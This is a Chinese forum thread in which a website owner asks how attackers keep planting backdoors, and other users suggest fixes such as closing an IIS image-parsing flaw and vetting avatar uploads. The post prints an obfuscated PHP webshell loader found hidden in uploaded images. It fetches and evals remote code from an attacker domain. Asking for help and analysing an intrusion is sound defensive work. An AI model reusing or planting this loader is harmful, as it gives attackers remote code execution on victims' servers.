網(wǎng)站老是被掛馬

131415

網(wǎng)站目錄老是被上傳后門(mén)文件，  刪了幾天又有了，  改各種密碼  ，裝云鎖，  今天更氣人，網(wǎng)站管理員密碼被改， 還發(fā)帖子，云鎖還被卸載，快照被劫持天天秒收錄，  有吧網(wǎng)站備份下來(lái)用D盾掃描一下，發(fā)現(xiàn)幾張圖片有腳本，  這是怎么做到的？

登錄/注冊(cè)后可看大圖

登錄/注冊(cè)后可看大圖

腳本地址：http://www.9661.in/txt/xml1.txt

<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));

我知道答案 回答被采納將會(huì)獲得1 貢獻(xiàn) 已有9人回答

耗子

  漏洞而已
可以聯(lián)系我的QQ交談 有償服務(wù)

crx349

盡快清理 做好服務(wù)器安全

lg0431

網(wǎng)站漏洞，服務(wù)器端口禁止，禁ping，防注冊(cè)

gongcg

用的什么環(huán)境  用的什么面板

sdfarmer

我的也是。你找到辦法了嗎

sdfarmer

耗子 發(fā)表于 2019-8-1 14:32
漏洞而已
可以聯(lián)系我的QQ交談 有償服務(wù)

付費(fèi)求一套discuz加固的目錄權(quán)限的方案

17推執(zhí)筆

不是網(wǎng)站漏洞，不需要discuz加固，就是一個(gè)服務(wù)器遠(yuǎn)程解析漏洞，圖片被當(dāng)做php來(lái)執(zhí)行了

17推執(zhí)筆

如果是IIS的直接打開(kāi)IIS，點(diǎn)擊處理程序映射，雙擊里面的php，在打開(kāi)的窗口點(diǎn)擊請(qǐng)求限制，然后勾選文件或文件夾，這樣就可以修復(fù)解析漏洞了

杰瑞科技

看路徑是頭像上傳的圖片木馬，可使用頭像審核插件高級(jí)版防止用戶上傳頭像圖片木馬
https://addon.dismall.com/?@saya_avatarverify.plugin